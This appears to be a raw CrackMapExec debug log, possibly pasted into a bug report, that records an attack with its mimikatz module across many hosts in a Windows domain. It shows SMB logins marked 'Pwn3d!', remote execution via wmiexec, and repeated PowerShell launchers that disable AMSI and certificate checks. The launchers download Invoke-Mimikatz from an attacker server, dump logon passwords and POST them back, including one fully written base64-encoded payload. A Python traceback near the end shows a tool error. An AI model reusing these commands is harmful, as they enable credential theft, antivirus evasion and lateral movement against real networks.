$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
MIMIKATZ 172.23.3.50 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ ACTSMAD.sometarget.com 445 ACTSMAD [+] Executed launcher | |
MIMIKATZ 172.28.2.68 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB CDC03.sometarget.com 445 CDC03 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv Zw -;sv cV ec;sv DU ((gv Zw).value.toString()+(gv cV).value.toString());powershell (gv DU).value.toString() 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" | |
DEBUG Target system is CDC03.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\CDC03[\\PIPE\\atsvc] | |
DEBUG StringBinding: CDC03[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:CDC03.sometarget.com[49154] | |
DEBUG Target system is ACCOG01.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\ACCOG01[\\PIPE\\atsvc] | |
DEBUG StringBinding: accog01[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:ACCOG01.sometarget.com[49154] | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv kQ -;sv wq ec;sv eP ((gv kQ).value.toString()+(gv wq).value.toString());powershell (gv eP).value.toString() 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" | |
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode. | |
Download it from https://www.dlitz.net/software/pycrypto | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB JUMPDR.sometarget.com 445 JUMPDR [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
MIMIKATZ TLPORTAL.sometarget.com 445 TLPORTAL [+] Executed launcher | |
MIMIKATZ ACTSM1.sometarget.com 445 ACTSM1 [+] Executed launcher | |
DEBUG Target system is JUMPDR.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\JUMPDR[\\PIPE\\atsvc] | |
DEBUG StringBinding: JUMPDR[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:JUMPDR.sometarget.com[49154] | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB NTISCISVR3V.sometarget.com 445 NTISCISVR3V [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
MIMIKATZ 172.23.2.51 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv On -;sv wI ec;sv eZ ((gv On).value.toString()+(gv wI).value.toString());powershell (gv eZ).value.toString() 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" | |
DEBUG Target system is NTISCISVR3V.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\NTISCISVR3V[\\PIPE\\atsvc] | |
DEBUG StringBinding: ntiscisvr3v[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:NTISCISVR3V.sometarget.com[49154] | |
MIMIKATZ 172.23.2.119 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ JUMPDR.sometarget.com 445 JUMPDR [+] Executed launcher | |
MIMIKATZ 172.23.2.195 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB SRV5.sometarget.com 445 SRV5 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv kD -;sv oA ec;sv pO ((gv kD).value.toString()+(gv oA).value.toString());powershell (gv pO).value.toString() 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" | |
DEBUG Target system is SRV5.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\SRV5[\\PIPE\\atsvc] | |
DEBUG StringBinding: SRV5[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:SRV5.sometarget.com[49154] | |
MIMIKATZ 172.23.2.118 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv NL -;sv HL ec;sv WE ((gv NL).value.toString()+(gv HL).value.toString());powershell (gv WE).value.toString() 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" | |
MIMIKATZ CDC03.sometarget.com 445 CDC03 [+] Executed launcher | |
MIMIKATZ 172.23.3.84 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB SRV4.sometarget.com 445 SRV4 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
MIMIKATZ 172.23.3.60 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ ACCOG01.sometarget.com 445 ACCOG01 [+] Executed launcher | |
MIMIKATZ 172.23.3.245 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ 172.23.3.21 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG Target system is SRV4.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\SRV4[\\PIPE\\atsvc] | |
DEBUG StringBinding: SRV4[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:SRV4.sometarget.com[49154] | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) 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" | |
MIMIKATZ 172.23.3.244 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode. | |
Download it from https://www.dlitz.net/software/pycrypto | |
MIMIKATZ NTISCISVR3V.sometarget.com 445 NTISCISVR3V [+] Executed launcher | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB ACSEPM.sometarget.com 445 ACSEPM [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Target system is ACSEPM.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\ACSEPM[\\PIPE\\atsvc] | |
DEBUG StringBinding: acsepm[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:ACSEPM.sometarget.com[49154] | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) 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" | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv jQ -;sv fT ec;sv YW ((gv jQ).value.toString()+(gv fT).value.toString());powershell (gv YW).value.toString() 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" | |
MIMIKATZ 172.23.2.120 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ SRV5.sometarget.com 445 SRV5 [+] Executed launcher | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) 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" | |
MIMIKATZ SRV4.sometarget.com 445 SRV4 [+] Executed launcher | |
MIMIKATZ ACSEPM.sometarget.com 445 ACSEPM [+] Executed launcher | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB CAZDC01.sometarget.com 445 CAZDC01 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Target system is CAZDC01.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\CAZDC01[\\PIPE\\atsvc] | |
DEBUG StringBinding: CAZDC01[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:CAZDC01.sometarget.com[49154] | |
MIMIKATZ 172.28.2.11 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ 172.23.2.72 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.2.72', 56456) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.2.98 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB SRV6.sometarget.com 445 SRV6 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
MIMIKATZ 172.27.2.121 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG Target system is SRV6.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\SRV6[\\PIPE\\atsvc] | |
DEBUG StringBinding: SRV6[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:SRV6.sometarget.com[49154] | |
MIMIKATZ 172.23.2.29 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.2.29', 61732) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAA
PQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
MIMIKATZ 172.23.3.86 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ CAZDC01.sometarget.com 445 CAZDC01 [+] Executed launcher | |
MIMIKATZ 172.23.2.244 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG Executed command via wmiexec | |
